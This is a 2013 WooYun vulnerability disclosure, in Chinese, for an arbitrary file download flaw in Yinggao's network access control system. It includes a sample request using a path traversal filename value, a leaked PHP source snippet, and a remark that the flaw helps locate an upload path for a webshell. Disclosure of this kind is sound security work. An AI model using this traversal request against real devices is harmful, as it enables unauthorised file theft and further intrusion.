当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-016919

漏洞标题:盈高入网规范管理系统任意文件下载

相关厂商:盈高科技

漏洞作者: Slcio

提交时间:2013-07-18 14:06

修复时间:2013-10-16 14:07

公开时间:2013-10-16 14:07

漏洞类型:任意文件遍历/下载

危害等级:低

自评Rank:12

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-10-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

盈高入网规范管理系统 是常见的准入控制设备,其后下载功能存在下载绕过,可以下载任意文件。

详细说明:

该系统的软件下载页面,数据库备份下载页面等所有下载页面存在下载任意文件漏洞。但是找到其真实路径比较困难。不过通过经验猜到框架形式还是很容易获取路径的。
如下面地址
http://地址/trade.php?tradecode=databack&filename=/../mod/system/set/trade/softset.php
由于是在客户内网挖掘,不太记得路径地址印象是这样的,如果厂家可以提供一台设备测试可以精确帮忙定位该漏洞,下面会贴上下载到的代码。

1.jpg


2.jpg

漏洞证明:

<?php
if(!defined('IN_ACCESS'))
exit('Access Denied!');
class TradeSoftSet extends Trade
{
public function processTradecode()
{
global $gTemplate,$aCommon,$gAlertScript, $gNavBar,$backfiles, $SMARTY;

//导航
$gNavBar = array('system_set'=>'系统设置','0'=>'软件管理');

$uploaddir = DROOT . "/download/soft/";
if( !is_dir($uploaddir) )
mkdir($uploaddir);


通过下载文件下载到上传文件的程序并找到上传路径并获取上传shell的地址。

修复方案:

由于该设备一个下午黑盒测试出多出漏洞,建议对其安全性进行全面检测。尤其对是代码进行全面审计,确保该类设备的安全。

版权声明:转载请注明来源 Slcio@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论